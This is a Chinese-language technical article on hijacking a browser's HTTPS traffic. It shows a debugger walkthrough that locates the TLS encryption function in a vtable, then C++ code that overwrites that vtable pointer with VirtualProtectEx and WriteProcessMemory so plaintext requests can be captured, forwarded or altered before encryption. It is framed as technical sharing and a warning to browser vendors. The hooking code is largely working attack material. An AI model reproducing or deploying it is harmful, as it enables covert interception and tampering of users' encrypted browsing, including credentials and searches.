現在很多網站都使用了 https 的方案，保證了傳輸中的資料不被修改或者被第三方封包軟體看見，但是由於https有一些隱含的缺陷或者伺服器驗證的不嚴格，https被劫持的可能性存在，就像之前出現了”淨廣大師”病毒劫持https,往百度搜索裡插入廣告id,他使用的方法就是中間人攻擊，強行插入自己的證書實現解密https，今天我們介紹一種瀏覽器劫持的方法實現https劫持，現在我們就開始分析去找到瀏覽器中https加密的入口。

（一）分析方法

首先我們開啟瀏覽器(注意:這裡涉及的瀏覽器的名字都會被隱去)，輸入baidu.com,在baidu裡輸入666666

我們可以看到baidu搜尋時瀏覽器位址列裡，baidu的網站使用的是https連結地址

接下來使用偵錯程式ollydbg去附加瀏覽器，然後在命令輸入bp WSASend

然後重新點選百度裡的搜尋按鈕，這是偵錯程式會斷在WSASend地方：

我們再看堆疊區域，往下翻堆疊會看到

有sha256相關的hash計算的，這裡就是說在傳送資料之前經過一些tls的計算的過程，下面我繼續走掉返回到呼叫WSASend的地方:  0x66F20F20

這裡並不是明文所在的地方，一般進入發包的地方時已經被加密了，我們繼續走下去，返回到呼叫該函式區域的所在函式，因為這個函式沒什麼特徵性，應該還沒到達https加密前所在的地方，返回到一個呼叫比較特別的地方。

當我們返回到這裡

我們直接下斷點在CALL DWORD PTR DS:[EDX+8]，然後F9，接下來瀏覽器就停在了這句程式碼上，我們具體分析下記憶體EDX地址是: 0×68337724

發現此地址確實是個函式表

這時我們在翻堆疊資訊時發現了明文的請求資訊

按下快捷鍵:ctrl + G ，輸入0x66FC422D,進入該函式地址區域：

66FC4219    E8 020F1401     CALL xxxxxx.68105120

66FC421E    83C4 0

66FC4221    03DF            ADD EBX,EDI

66FC4223    017E 28         ADD DWORD PTR DS:[ESI+28],EDI

66FC4226    8BCE            MOV ECX,ESI

66FC4228    E8 D6000000     CALL chrome_1.66FC4303

66FC422D    837E 2C 00      CMP DWORD PTR DS:[ESI+2C],0

66FC4231    0F84 C1000000   JE chrome_1.66FC42F8

66FC4237    837E 2C FF      CMP DWORD PTR DS:[ESI+2C],-1

66FC423B    0F84 B7000000   JE chrome_1.66FC42F8

66FC4241    837E 1C FF      CMP DWORD PTR DS:[ESI+1C],-1

66FC4245    0F85 AD000000   JNZ chrome_1.66FC42F8

66FC424B    8D4424 20       LEA EAX,DWORD PTR SS:[ESP+20]

66FC424F    50              PUSH EAX

66FC4250    8D4E 34         LEA ECX,DWORD PTR DS:[ESI+34]

66FC4253    E8 4DBB2CFF     CALL xxxxxxx.6628FDA5

發現這裡並沒有什麼特殊地方我們可以繼續F8單步走下去，當我們走到地址67034AB0，知道我們之前呼叫有個特殊的函式，call  [eax+0x30], 可以猜測這裡的呼叫也是一個虛表裡的函式。

接下來我們把之前的所有斷點全部禁用

然後在這個函式地方下斷點，重新開始baidu搜尋，這時瀏覽器停在了這個函式call  [eax+0x30]的地方 ,此時eax值為0x683A1908

檢視eax的記憶體所在的地址確實是個函式表，是虛表沒錯了，edi地址也有明文。

在分析堆疊，該函式有三個引數

在call [eax+0x30]前有三個

push [ebp+8]

push edi

push esi

說明該函式是三個引數,在上面堆疊中我們找到前三個值分別是

0x197D8EE8是第一個引數,這是一個c++類地址，因為0x197D8EE8裡的值就是eax的值。

0x19F2A390 第二個引數為明文緩衝區地址

0x6BF 第三個引數為緩衝區的長度

下面我們驗證下我們對以上三個引數的驗證，按F9,下次瀏覽器會繼續停在該函式的地方

檢視堆疊，確實如上猜測 ：

我們再繼續回過頭分析eax這個值，0x683A1980,這個地址在當前這個程式的這個程式碼模組內，且在這個模組的”.rdata”程式段內，那這足以證明該地址就是一個https的加密類，而0×30的偏移的函式就是加密函式入口。

（二）程式碼實現

分析到了具體的地方，我們就可以寫程式去掛鉤這個虛表函式去獲取瀏覽器每次發出去的明文請求。

我們可以定義一個c++ 虛類

class ssl_https;

typedef int ( __cdecl *pSSL_Unknow)(ssl_https* bio,const char* buffer ,const int len );

typedef int ( __cdecl *pSSL_Crypt)(ssl_https* bio,const char* buffer ,const int len );

class ssl_https

{

public:

 ssl_https();

 ~ssl_https();

public:

 int m_ssl_type;

 int m_ssl_flags;

 pSSL_Unknow pSSL_Unknow_1;

 pSSL_Unknow pSSL_Unknow_2;

 pSSL_Unknow pSSL_Unknow_3;

 pSSL_Unknow pSSL_Unknow_4;

 pSSL_Unknow pSSL_Unknow_5;

 pSSL_Unknow pSSL_Unknow_6;

 pSSL_Unknow pSSL_Unknow_7;

 pSSL_Unknow pSSL_Unknow_8;

 pSSL_Unknow pSSL_Unknow_9;

 pSSL_Unknow pSSL_Unknow_10;

 pSSL_Crypt  pSSL_Crypt;

 pSSL_Unknow pSSL_Unknow_11;

 pSSL_Unknow pSSL_Unknow_12;

 pSSL_Unknow pSSL_Unknow_13;

 pSSL_Unknow pSSL_Unknow_14;

 pSSL_Unknow pSSL_Unknow_15;

 pSSL_Unknow pSSL_Unknow_16;

 pSSL_Unknow pSSL_Unknow_17;

 pSSL_Unknow pSSL_Unknow_18;

 pSSL_Unknow pSSL_Unknow_19;

 pSSL_Unknow pSSL_Unknow_20;

 pSSL_Unknow pSSL_Unknow_21;

};

其中pSSL_Crypt 這個地址就是0×30的偏移的函式指標，接著我就寫一個hijack類去實現hook瀏覽器

class CBrowser

{

public:

 CBrowser();

 ~CBrowser();

 BOOL Init();

 static int __cdecl SSL_Crypt(ssl_https* ssl,const char* buffer ,const int len );

private:

 ssl_https* m_sslBio;

public:

 ssl_https* getSslhttps();

};

CBrowser::CBrowser()

{

 m_sslBio = NULL;

}

CBrowser::~CBrowser()

{

}

BOOL CBrowser::Init()

{

 //待搜尋續表所在地址的特徵碼（都是偽碼）

 BYTE search_bytes[] = {0xa0,0xff,0xaa,0x99,0x8a,0x75,0x0E};

 //在瀏覽器的模組裡搜尋我們需要找到的特徵碼

 BYTE* bytes_addr = (BYTE*)SearchCodeAddress(

  "瀏覽器.dll",

  ".text",

  search_bytes,

  sizeof(search_bytes));

 if (bytes_addr)

 {

  {

   ULONG_PTR* pAddress = 0;

   pAddress = (ULONG_PTR*)(*((ULONG_PTR*)&bytes_addr[8]));

   if ( pAddress)

   {

    //這裡是比較續表的大小是否在範圍裡

    if ( abs((long)((pAddress[1]) -(ULONG_PTR) pAddress))  < 0x100)

    {

     ssl_https* oril_ssl = (ssl_https*)(pAddress[1]);

     //分配一個新虛表地址

     m_sslBio = (ssl_https*)malloc(sizeof(ssl_https));

     if (m_sslBio)

     {

      //複製原始虛表函式表

      memcpy(m_sslBio,oril_ssl,sizeof(ssl_https));

      DWORD dwOldProtect = 0;

      DWORD dwTemp;

      ULONG_PTR NewSslCrypt = (ULONG_PTR)SSL_Crypt;

      //去掉地址保護屬性

      VirtualProtectEx(

        GetCurrentProcess(),

        &oril_ssl->pSSL_Crypt,

        sizeof(ULONG_PTR),

        PAGE_READWRITE,

        &dwOldProtect);

      //改寫地址的值為自己的掛鉤函式

      if(::WriteProcessMemory(

        GetCurrentProcess(),

        &oril_ssl->pSSL_Crypt,

        &NewSslCrypt,

        sizeof(ULONG_PTR),

        NULL))

      {

        VirtualProtectEx(

         GetCurrentProcess(),

         &oril_ssl->pSSL_Crypt,

         sizeof(ULONG_PTR),

         dwOldProtect,

         &dwTemp);

        return TRUE;

      }

      VirtualProtectEx(

        GetCurrentProcess(),

        &oril_ssl->pSSL_Crypt,

        sizeof(ULONG_PTR),

        dwOldProtect,

        &dwTemp);

     }

    }

   }

  }

 }

 return FALSE;

}

ssl_https* CBrowser::getSslBio()

{

 return m_sslBio;

}

int CBrowser::SSL_Crypt(ssl_https* bio,const char* buffer ,const int len )

{

 if (getSslBio())

 {

  //在這裡我們可以加入自己的分析過濾模組, 對原始請求進行過濾

  Analyze(buffer,len);

  //呼叫原始的函式表去加密

  int nResult = getSslBio()->pSSL_Crypt(bio,buffer,len);

  return nResult;

 }

 return 0;

}

在以上程式碼我們獲取了模組加密類的虛表地址後就替換剛才那個偏移地址，修改指標去實現hook，當我們在瀏覽器裡百度搜索時，會停在我們的函式裡

Buffer引數

Len值

結果和我們預想的一樣，這樣我們就通過hook實現了瀏覽器https明文的截獲，在我們的hook函式中我們可以做任何事情，可以過濾資料，可以轉發資料，甚至我們還能修改請求資料，如果我們再hook了瀏覽器的https的解密函式，也能過濾或者修改從伺服器端接受的https資料迴應資訊，實現我們想要的各種功能。

總結

自此本文結束，綜上所講的hook技術能夠破壞瀏覽器程式本身，導致https被劫持，而瀏覽器卻無法察覺，可見瀏覽器廠商對自身的安全性保障也是一個很重要的、值得他們去深思研究的問題。

（注意：本文只是屬於技術分享，請勿用於非正常途徑，故而會隱去瀏覽器的名稱）